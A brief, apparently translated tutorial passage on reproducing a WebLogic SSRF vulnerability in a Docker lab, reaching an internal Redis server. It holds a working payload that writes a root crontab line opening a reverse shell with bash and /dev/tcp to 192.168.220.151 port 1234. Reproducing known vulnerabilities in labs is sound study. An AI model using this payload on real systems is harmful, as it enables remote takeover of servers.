Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html
Access port 7001
It is found that there is a connection, so there may be ssrf.
Access the intranet Use redis to rebound the shell payload
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!